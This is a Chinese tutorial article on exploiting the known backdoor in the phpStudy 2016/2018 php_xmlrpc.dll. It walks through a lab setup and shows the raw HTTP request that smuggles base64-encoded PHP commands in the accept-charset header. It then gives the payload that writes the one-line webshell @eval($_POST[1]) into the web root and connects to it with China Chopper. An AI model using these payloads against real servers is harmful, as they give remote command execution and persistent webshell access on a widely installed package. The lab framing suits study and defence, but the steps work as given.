温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

如何使用phpstudy后门漏洞

发布时间:2021-10-18 10:51:25 来源:亿速云 阅读:400 作者:柒染 栏目:安全技术

如何使用phpstudy后门漏洞,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。

phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户。但是存在后门漏洞,可直接getshell。

漏洞存在版本:phpStudy2016php\php-5.2.17\ext\php_xmlrpc.dllphp\php-5.4.45\ext\php_xmlrpc.dllphpStudy2018PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dllPHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

准备工作:服务器:192.168.29.135(Windows server 2008 SP2)phpStudy2016(php-5.4.45+Apache)

一.漏洞环境搭建

1.下载phpStudy2016版的phpstudy,启动后切换至php-5.4.45+Apache版本如何使用phpstudy后门漏洞2. 查看服务器的IP地址如何使用phpstudy后门漏洞3. 直接访问http://192.168.29.135/,可得到以下界面(以下界面是自行配置的index.php界面,可根据情况自行配置)如何使用phpstudy后门漏洞

二.漏洞成因

1. 查看文件C:\phpStudy\php\php-5.4.45\ext\php_xmlrpc.dll(这是我的安装路径,根据实际的安装情况查看安装路径),Ctrl+F查找关键字“@evel”,找到了“@eval(%s('%s'));”,这也是漏洞的成因。如何使用phpstudy后门漏洞

三.漏洞复现

1.访问URL:http://192.168.29.135/,进行抓取数据包操作,并且将其发送到repeater模块如何使用phpstudy后门漏洞2.添加Accept-Encoding和accept-charset参数注意事项:如果没有Accept-Encoding这个参数,需要手动加上,并且注意“gzip”和“deflate”之间存在一个逗号,并且中间没有空格。需要手动加上:accept-charset:执行命令的base 64编码echo system("net user");的base64编码为

ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7--------GET / HTTP/1.1Host: 192.168.29.135User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:gzip,deflateaccept-charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7Connection: closeUpgrade-Insecure-Requests: 1Cache-Control: max-age=0--------

执行结果为:如何使用phpstudy后门漏洞3.构造一句话木马写入到web路径下:

fputs(fopen('C:\phpStudy\WWW\xx.php','w'),'<?php@eval($_POST[1])?>');

4.将构造的语句进行base64加密(删掉下方加密中的左括号)ZnB1dHMoZm(9wZW4oJ0M6XHBocFN0dWR5XFdXV1x4eC5waHAnLCd3JyksJzw/cGhwIEBldmFsKCRfUE9TVFsxXSk/PicpOw==修改accept-charset的参数值,写入一句话木马如何使用phpstudy后门漏洞5.查看服务器端是否将文件写入如何使用phpstudy后门漏洞6.使用菜刀进行连接操作,URL:http://192.168.29.135/xx.php,密码为1如何使用phpstudy后门漏洞原文链接

关于如何使用phpstudy后门漏洞问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注亿速云行业资讯频道了解更多相关知识。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI